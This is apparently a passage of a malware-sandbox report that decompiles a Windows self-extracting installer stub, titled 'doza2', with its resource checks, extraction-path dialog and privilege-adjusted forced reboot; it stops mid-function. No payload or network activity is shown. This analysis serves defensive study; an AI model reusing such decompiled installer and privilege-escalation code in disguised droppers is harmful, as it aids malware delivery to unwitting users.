                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195f7f
                                                                                                                                                                                                                                    0x00195ec3
                                                                                                                                                                                                                                    0x00195ec3
                                                                                                                                                                                                                                    0x00195ecc
                                                                                                                                                                                                                                    0x00195ed4
                                                                                                                                                                                                                                    0x00195ed6
                                                                                                                                                                                                                                    0x00195edc
                                                                                                                                                                                                                                    0x00195edf
                                                                                                                                                                                                                                    0x00195eea
                                                                                                                                                                                                                                    0x00195eed
                                                                                                                                                                                                                                    0x00195f3f
                                                                                                                                                                                                                                    0x00195f40
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195eef
                                                                                                                                                                                                                                    0x00195eef
                                                                                                                                                                                                                                    0x00195ef2
                                                                                                                                                                                                                                    0x00195f34
                                                                                                                                                                                                                                    0x00195ef4
                                                                                                                                                                                                                                    0x00195ef4
                                                                                                                                                                                                                                    0x00195ef7
                                                                                                                                                                                                                                    0x00195f2b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195ef9
                                                                                                                                                                                                                                    0x00195ef9
                                                                                                                                                                                                                                    0x00195efc
                                                                                                                                                                                                                                    0x00195f22
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195efe
                                                                                                                                                                                                                                    0x00195eff
                                                                                                                                                                                                                                    0x00195f02
                                                                                                                                                                                                                                    0x00195f16
                                                                                                                                                                                                                                    0x00195f04
                                                                                                                                                                                                                                    0x00195f07
                                                                                                                                                                                                                                    0x00195f0d
                                                                                                                                                                                                                                    0x00195f46
                                                                                                                                                                                                                                    0x00195f46
                                                                                                                                                                                                                                    0x00195f09
                                                                                                                                                                                                                                    0x00195f09
                                                                                                                                                                                                                                    0x00195f09
                                                                                                                                                                                                                                    0x00195f07
                                                                                                                                                                                                                                    0x00195f02
                                                                                                                                                                                                                                    0x00195efc
                                                                                                                                                                                                                                    0x00195ef7
                                                                                                                                                                                                                                    0x00195ef2
                                                                                                                                                                                                                                    0x00195f4c
                                                                                                                                                                                                                                    0x00195f4e
                                                                                                                                                                                                                                    0x00195f50
                                                                                                                                                                                                                                    0x00195f54
                                                                                                                                                                                                                                    0x00195ed4
                                                                                                                                                                                                                                    0x00195ea2
                                                                                                                                                                                                                                    0x00195ea4
                                                                                                                                                                                                                                    0x00195eaf
                                                                                                                                                                                                                                    0x00195eaf
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195e79
                                                                                                                                                                                                                                    0x00195e7d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195e83
                                                                                                                                                                                                                                    0x00195e83
                                                                                                                                                                                                                                    0x00195e83
                                                                                                                                                                                                                                    0x00195e85
                                                                                                                                                                                                                                    0x00195e85
                                                                                                                                                                                                                                    0x00195e8e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195e94
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195e94
                                                                                                                                                                                                                                    0x00195e8e
                                                                                                                                                                                                                                    0x00195e7d
                                                                                                                                                                                                                                    0x00195e77
                                                                                                                                                                                                                                    0x00195e6e
                                                                                                                                                                                                                                    0x00195e65
                                                                                                                                                                                                                                    0x00195e5c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195dd0
                                                                                                                                                                                                                                    0x00195dd0
                                                                                                                                                                                                                                    0x00195dd0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195dd0
                                                                                                                                                                                                                                    0x00195dce
                                                                                                                                                                                                                                    0x00195dca
                                                                                                                                                                                                                                    0x00195dba
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195d00
                                                                                                                                                                                                                                    0x00195dd9
                                                                                                                                                                                                                                    0x00195e04
                                                                                                                                                                                                                                    0x001961fe
                                                                                                                                                                                                                                    0x00195e0a
                                                                                                                                                                                                                                    0x00195e0c
                                                                                                                                                                                                                                    0x00195e17
                                                                                                                                                                                                                                    0x00195e17
                                                                                                                                                                                                                                    0x00195e04
                                                                                                                                                                                                                                    0x00196200
                                                                                                                                                                                                                                    0x00196200
                                                                                                                                                                                                                                    0x00000000

APIs
• CharNextA.USER32(?,00000000,?,?), ref: 00195CEE
• GetModuleFileNameA.KERNEL32(00198B3E,00000104,00000000,?,?), ref: 00195DFC
• CharUpperA.USER32(?), ref: 00195E3E
• CharUpperA.USER32(-00000052), ref: 00195EE1
• CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00195F6F
• CharUpperA.USER32(?), ref: 00195FA7
• CharUpperA.USER32(-0000004E), ref: 00196008
• CharUpperA.USER32(?), ref: 001960AA
• CloseHandle.KERNEL32(00000000,00191140,00000000,00000040,00000000), ref: 001961F1
• ExitProcess.KERNEL32 ref: 001961F8
Strings
Memory Dump Source
• Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
Similarity
• API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
• String ID: "$"$:$RegServer
• API String ID: 1203814774-25366791
• Opcode ID: 97534eba6af142cc1fcd3bb5e89400cf6a31d822944c51acd51f1c8af4e07a9d
• Instruction ID: 768b72f0bf2851c00e21258906463041b1326adb6e38f7157cf0059e65d4861f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 97534eba6af142cc1fcd3bb5e89400cf6a31d822944c51acd51f1c8af4e07a9d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C0D17971A04A545EDF3B8B3C8C487BA7BA3AB16340F1800AAD486F7590DB758EC6CB51
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 60%
                                                                                                                                                                                                                                    			E00191F90(signed int __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				int _v12;
                                                                                                                                                                                                                                    				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                                                                                                                                    				void* _v28;
                                                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                                                    				signed int _t13;
                                                                                                                                                                                                                                    				int _t21;
                                                                                                                                                                                                                                    				void* _t25;
                                                                                                                                                                                                                                    				int _t28;
                                                                                                                                                                                                                                    				signed char _t30;
                                                                                                                                                                                                                                    				void* _t38;
                                                                                                                                                                                                                                    				void* _t40;
                                                                                                                                                                                                                                    				void* _t41;
                                                                                                                                                                                                                                    				signed int _t46;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t41 = __esi;
                                                                                                                                                                                                                                    				_t38 = __edi;
                                                                                                                                                                                                                                    				_t30 = __ecx;
                                                                                                                                                                                                                                    				if((__ecx & 0x00000002) != 0) {
                                                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                                                    					if((_t30 & 0x00000004) != 0) {
                                                                                                                                                                                                                                    						L14:
                                                                                                                                                                                                                                    						if( *0x199a40 != 0) {
                                                                                                                                                                                                                                    							_pop(_t30);
                                                                                                                                                                                                                                    							_t44 = _t46;
                                                                                                                                                                                                                                    							_t13 =  *0x198004; // 0x21bd9a3c
                                                                                                                                                                                                                                    							_v8 = _t13 ^ _t46;
                                                                                                                                                                                                                                    							_push(_t38);
                                                                                                                                                                                                                                    							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                                                                                                                                                                                    								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                                                                                                                                                                                    								_v24.PrivilegeCount = 1;
                                                                                                                                                                                                                                    								_v12 = 2;
                                                                                                                                                                                                                                    								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                                                                                                                                                                                    								CloseHandle(_v28);
                                                                                                                                                                                                                                    								_t41 = _t41;
                                                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                                                    								if(_t21 != 0) {
                                                                                                                                                                                                                                    									if(ExitWindowsEx(2, ??) != 0) {
                                                                                                                                                                                                                                    										_t25 = 1;
                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                    										_t37 = 0x4f7;
                                                                                                                                                                                                                                    										goto L3;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									_t37 = 0x4f6;
                                                                                                                                                                                                                                    									goto L4;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								_t37 = 0x4f5;
                                                                                                                                                                                                                                    								L3:
                                                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                                                    								L4:
                                                                                                                                                                                                                                    								_push(0x10);
                                                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                                                    								E001944B9(0, _t37);
                                                                                                                                                                                                                                    								_t25 = 0;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							_pop(_t40);
                                                                                                                                                                                                                                    							return E00196CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t28 = ExitWindowsEx(2, 0);
                                                                                                                                                                                                                                    							goto L16;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t37 = 0x522;
                                                                                                                                                                                                                                    						_t28 = E001944B9(0, 0x522, 0x191140, 0, 0x40, 4);
                                                                                                                                                                                                                                    						if(_t28 != 6) {
                                                                                                                                                                                                                                    							goto L16;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					__eax = E00191EA7(__ecx);
                                                                                                                                                                                                                                    					if(__eax != 2) {
                                                                                                                                                                                                                                    						L16:
                                                                                                                                                                                                                                    						return _t28;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						goto L12;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    			}

                                                                                                                                                                                                                                    0x00191f1a
                                                                                                                                                                                                                                    0x00191f1f
                                                                                                                                                                                                                                    0x00191f1f
                                                                                                                                                                                                                                    0x00191f86
                                                                                                                                                                                                                                    0x00191f8f
                                                                                                                                                                                                                                    0x00191fcf
                                                                                                                                                                                                                                    0x00191fd3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00191fd3
                                                                                                                                                                                                                                    0x00191fa9
                                                                                                                                                                                                                                    0x00191fb4
                                                                                                                                                                                                                                    0x00191fbb
                                                                                                                                                                                                                                    0x00191fc3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00191fc3
                                                                                                                                                                                                                                    0x00191f9a
                                                                                                                                                                                                                                    0x00191f9a
                                                                                                                                                                                                                                    0x00191fa2
                                                                                                                                                                                                                                    0x00191fd9
                                                                                                                                                                                                                                    0x00191fda
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00191fa2

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00191EFB
                                                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00191F02
                                                                                                                                                                                                                                    • ExitWindowsEx.USER32(00000002,00000000), ref: 00191FD3
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                                                    • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                    • API String ID: 2795981589-3733053543
                                                                                                                                                                                                                                    • Opcode ID: ebefc94ccfa6fc6b04ac4357c705b4c5658b54c611d5d0a9b62f8cd4f334f20b
                                                                                                                                                                                                                                    • Instruction ID: d0f139e15bc83f5da5b52e254d6be2494f71eb7586dc1cfd0f5019765fa33a85
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ebefc94ccfa6fc6b04ac4357c705b4c5658b54c611d5d0a9b62f8cd4f334f20b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 71210B71B4020A7BDF205BA19C4AFBF77B8EF85B10F10002AFA02D6580D77488C992A1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E00196CF0(struct _EXCEPTION_POINTERS* _a4) {
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                                                    				UnhandledExceptionFilter(_a4);
                                                                                                                                                                                                                                    				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                                                    			}



                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00196E26,00191000), ref: 00196CF7
                                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(00196E26,?,00196E26,00191000), ref: 00196D00
                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409,?,00196E26,00191000), ref: 00196D0B
                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,00196E26,00191000), ref: 00196D12
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3231755760-0
                                                                                                                                                                                                                                    • Opcode ID: a1eab604a4228a21b5fe432c9635e3af7311db3b12f1968d0795dbc3f5ea14b4
                                                                                                                                                                                                                                    • Instruction ID: 989bc9a4ef8fd59f20806acb45ebecb826dc33fe7fc9c92af6bf81585005b17a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a1eab604a4228a21b5fe432c9635e3af7311db3b12f1968d0795dbc3f5ea14b4
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0CD0C932000108BBDB002BE1EC0CA593F28EF88212F844022F31982830CA3244958B93
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 76%
                                                                                                                                                                                                                                    			E00193210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                    				void* _t6;
                                                                                                                                                                                                                                    				void* _t10;
                                                                                                                                                                                                                                    				int _t20;
                                                                                                                                                                                                                                    				int _t21;
                                                                                                                                                                                                                                    				int _t23;
                                                                                                                                                                                                                                    				char _t24;
                                                                                                                                                                                                                                    				long _t25;
                                                                                                                                                                                                                                    				int _t27;
                                                                                                                                                                                                                                    				int _t30;
                                                                                                                                                                                                                                    				void* _t32;
                                                                                                                                                                                                                                    				int _t33;
                                                                                                                                                                                                                                    				int _t34;
                                                                                                                                                                                                                                    				int _t37;
                                                                                                                                                                                                                                    				int _t38;
                                                                                                                                                                                                                                    				int _t39;
                                                                                                                                                                                                                                    				void* _t42;
                                                                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                                                                    				CHAR* _t49;
                                                                                                                                                                                                                                    				void* _t58;
				void* _t63;
				struct HWND__* _t64;

				_t64 = _a4; // hDlg
				_t6 = _a8 - 0x10; // _a8 = uMsg; 0x10 = WM_CLOSE
				if(_t6 == 0) {
					_push(0);
					L38:
					EndDialog(_t64, ??);
					L39:
					__eflags = 1;
					return 1;
				}
				_t42 = 1;
				_t10 = _t6 - 0x100; // _a8 == 0x110 (WM_INITDIALOG)
				if(_t10 == 0) {
					E001943D0(_t64, GetDesktopWindow()); // position dialog relative to the desktop
					SetWindowTextA(_t64, "doza2");
					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0); // 0xc5 = EM_LIMITTEXT: cap the path edit control (0x835) at 0x103 chars
					__eflags =  *0x199a40 - _t42; // 0x3
					if(__eflags == 0) {
						EnableWindow(GetDlgItem(_t64, 0x836), 0); // grey out control 0x836 when the global flag at 0x199a40 == 1
					}
					L36:
					return _t42;
				}
				if(_t10 == _t42) { // _a8 == 0x111 (WM_COMMAND); _a12 = wParam (control/command id)
					_t20 = _a12 - 1; // 1 = IDOK
					__eflags = _t20;
					if(_t20 == 0) {
						_t21 = GetDlgItemTextA(_t64, 0x835, 0x1991e4, 0x104); // read the target path into the 0x104-byte (MAX_PATH) buffer at 0x1991e4
						__eflags = _t21;
						if(_t21 == 0) {
							L32:
							_t58 = 0x4bf; // string resource id for the error prompt
							_push(0);
							_push(0x10); // 0x10 = MB_ICONHAND
							_push(0);
							_push(0);
							L25:
							E001944B9(_t64, _t58); // likely a MessageBox-style wrapper (its result is compared against IDYES = 6 below)
							goto L39;
						}
						_t49 = 0x1991e4;
						do { // strlen over the path buffer
							_t23 =  *_t49;
							_t49 =  &(_t49[1]);
							__eflags = _t23;
						} while (_t23 != 0);
						__eflags = _t49 - 0x1991e5 - 3;
						if(_t49 - 0x1991e5 < 3) { // path shorter than 3 chars is rejected
							goto L32;
						}
						_t24 =  *0x1991e5; // 0x3a = ':' (second char of a drive-letter path such as "C:\")
						__eflags = _t24 - 0x3a;
						if(_t24 == 0x3a) {
							L21:
							_t25 = GetFileAttributesA(0x1991e4);
							__eflags = _t25 - 0xffffffff; // 0xffffffff = INVALID_FILE_ATTRIBUTES
							if(_t25 != 0xffffffff) { // path already exists
								L26:
								E0019658A(0x1991e4, 0x104, 0x191140);
								_t27 = E001958C8(0x1991e4);
								__eflags = _t27;
								if(_t27 != 0) {
									__eflags =  *0x1991e4 - 0x5c; // 0x5c = '\\'
									if( *0x1991e4 != 0x5c) {
										L30:
										_t30 = E0019597D(0x1991e4, 1, _t64, 1);
										__eflags = _t30;
										if(_t30 == 0) {
											L35:
											_t42 = 1;
											__eflags = 1;
											goto L36;
										}
										L31:
										_t42 = 1;
										EndDialog(_t64, 1);
										goto L36;
									}
									__eflags =  *0x1991e5 - 0x5c; // path starts with "\\" (UNC)
									if( *0x1991e5 == 0x5c) {
										goto L31;
									}
									goto L30;
								}
								_push(0);
								_push(0x10); // MB_ICONHAND
								_push(0);
								_push(0);
								_t58 = 0x4be; // string resource id
								goto L25;
							}
							_t32 = E001944B9(_t64, 0x54a, 0x1991e4, 0, 0x20, 4); // 0x20 = MB_ICONQUESTION, 4 = MB_YESNO: ask before creating the directory
							__eflags = _t32 - 6; // 6 = IDYES
							if(_t32 != 6) {
								goto L35;
							}
							_t33 = CreateDirectoryA(0x1991e4, 0);
							__eflags = _t33;
							if(_t33 != 0) {
								goto L26;
							}
							_push(0);
							_push(0x10); // MB_ICONHAND
							_push(0);
							_push(0x1991e4);
							_t58 = 0x4cb; // string resource id (directory creation failed)
							goto L25;
						}
						__eflags =  *0x1991e4 - 0x5c; // not a drive-letter path: must start with "\\"
						if( *0x1991e4 != 0x5c) {
							goto L32;
						}
						__eflags = _t24 - 0x5c;
						if(_t24 != 0x5c) {
							goto L32;
						}
						goto L21;
					}
					_t34 = _t20 - 1; // _a12 == 2 (IDCANCEL)
					__eflags = _t34;
					if(_t34 == 0) {
						EndDialog(_t64, 0);
						 *0x199124 = 0x800704c7; // HRESULT_FROM_WIN32(ERROR_CANCELLED): record that the user cancelled
						goto L39;
					}
					__eflags = _t34 != 0x834; // _a12 == 0x836 (the control disabled during WM_INITDIALOG above)
					if(_t34 != 0x834) {
						goto L36;
					}
					_t37 = LoadStringA( *0x199a3c, 0x3e8, 0x198598, 0x200); // string resource 0x3e8 (1000) into a 0x200-byte buffer
					__eflags = _t37;
					if(_t37 != 0) {
						_t38 = E00194224(_t64, _t46, _t46);
						__eflags = _t38;
						if(_t38 == 0) {
							goto L36;
						}
						_t39 = SetDlgItemTextA(_t64, 0x835, 0x1987a0); // write the chosen path back into the edit control
						__eflags = _t39;
						if(_t39 != 0) {
							goto L36;
						}
						_t63 = 0x4c0;
                                                                                                                                                                                                                                    						L9:
                                                                                                                                                                                                                                    						E001944B9(_t64, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                    						_push(0);
                                                                                                                                                                                                                                    						goto L38;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t63 = 0x4b1;
                                                                                                                                                                                                                                    					goto L9;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                                                    			}

























                                                                                                                                                                                                                                    0x001932ce
                                                                                                                                                                                                                                    0x00193251
                                                                                                                                                                                                                                    0x00193256
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193271
                                                                                                                                                                                                                                    0x00193277
                                                                                                                                                                                                                                    0x00193279
                                                                                                                                                                                                                                    0x00193298
                                                                                                                                                                                                                                    0x0019329d
                                                                                                                                                                                                                                    0x0019329f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001932b0
                                                                                                                                                                                                                                    0x001932b6
                                                                                                                                                                                                                                    0x001932b8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001932be
                                                                                                                                                                                                                                    0x00193280
                                                                                                                                                                                                                                    0x00193289
                                                                                                                                                                                                                                    0x0019328e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019328e
                                                                                                                                                                                                                                    0x0019327b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019327b
                                                                                                                                                                                                                                    0x00000000

APIs
• LoadStringA.USER32(000003E8,00198598,00000200), ref: 00193271
• GetDesktopWindow.USER32 ref: 001933E2
• SetWindowTextA.USER32(?,doza2), ref: 001933F7
• SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00193410
• GetDlgItem.USER32(?,00000836), ref: 00193426
• EnableWindow.USER32(00000000), ref: 0019342D
• EndDialog.USER32(?,00000000), ref: 0019343F
Strings
Memory Dump Source
• Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
Similarity
• API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
• String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$doza2
• API String ID: 2418873061-4002867030
• Opcode ID: cb30d6cab0159201cdd4d8f8a0eda667b9eb8e284a94671fc8fc86306a082a98
• Instruction ID: f9c896cc18d706eee3475f4cecbfe0fe6369401eb5556533b4a14f7ce364d57d
• Opcode Fuzzy Hash: cb30d6cab0159201cdd4d8f8a0eda667b9eb8e284a94671fc8fc86306a082a98
• Instruction Fuzzy Hash: A95167303802407BEF261B395C8CF7B2A5DEF96B54F504039F226E75D0CBA48F4692A2
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 93%
E00192CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
	signed int _v8;
	char _v268;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t13;
	void* _t20;
	void* _t23;
	void* _t27;
	struct HRSRC__* _t31;
	intOrPtr _t33;
	void* _t43;
	void* _t48;
	signed int _t65;
	struct HINSTANCE__* _t66;
	signed int _t67;

	_t13 =  *0x198004; // 0x21bd9a3c
	_v8 = _t13 ^ _t67;
	_t65 = 0;
	_t66 = __ecx;
	_t48 = __edx;
	 *0x199a3c = __ecx;
	memset(0x199140, 0, 0x8fc);
	memset(0x198a20, 0, 0x32c);
	memset(0x1988c0, 0, 0x104);
	 *0x1993ec = 1;
	_t20 = E0019468F("TITLE", 0x199154, 0x7f);
	if(_t20 == 0 || _t20 > 0x80) {
		_t64 = 0x4b1;
		goto L32;
	} else {
		_t27 = CreateEventA(0, 1, 1, 0);
		 *0x19858c = _t27;
		SetEvent(_t27);
		_t64 = 0x199a34;
		if(E0019468F("EXTRACTOPT", 0x199a34, 4) != 0) {
			if(( *0x199a34 & 0x000000c0) == 0) {
				L12:
				 *0x199120 =  *0x199120 & _t65;
				if(E00195C9E(_t48, _t48, _t65, _t66) != 0) {
					if( *0x198a3a == 0) {
						_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
						if(_t31 != 0) {
							_t65 = LoadResource(_t66, _t31);
						}
						if( *0x198184 != 0) {
							__imp__#17();
						}
						if( *0x198a24 == 0) {
							_t57 = _t65;
							if(E001936EE(_t65) == 0) {
								goto L33;
							} else {
								_t33 =  *0x199a40; // 0x3
								_t48 = 1;
								if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
									if(( *0x199a34 & 0x00000100) == 0 || ( *0x198a38 & 0x00000001) != 0 || E001918A3(_t64, _t66) != 0) {
										goto L30;
									} else {
										_t64 = 0x7d6;
										if(E00196517(_t57, 0x7d6, _t34, E001919E0, 0x547, 0x83e) != 0x83d) {
											goto L33;
										} else {
											goto L30;
										}
									}
                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                    												L30:
                                                                                                                                                                                                                                    												_t23 = _t48;
                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                    										_t23 = 1;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									E00192390(0x198a3a);
                                                                                                                                                                                                                                    									goto L33;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								_t64 = 0x520;
                                                                                                                                                                                                                                    								L32:
                                                                                                                                                                                                                                    								E001944B9(0, _t64, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                    								goto L33;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t64 =  &_v268;
                                                                                                                                                                                                                                    							if(E0019468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                    								goto L3;
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                                                                                                                                                                                    								 *0x198588 = _t43;
                                                                                                                                                                                                                                    								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                                                                                                                                                                                    									goto L12;
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									if(( *0x199a34 & 0x00000080) == 0) {
                                                                                                                                                                                                                                    										_t64 = 0x524;
                                                                                                                                                                                                                                    										if(E001944B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                                                                                                                                                                                    											goto L12;
                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                    											goto L11;
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                    										_t64 = 0x54b;
                                                                                                                                                                                                                                    										E001944B9(0, 0x54b, "doza2", 0, 0x10, 0);
                                                                                                                                                                                                                                    										L11:
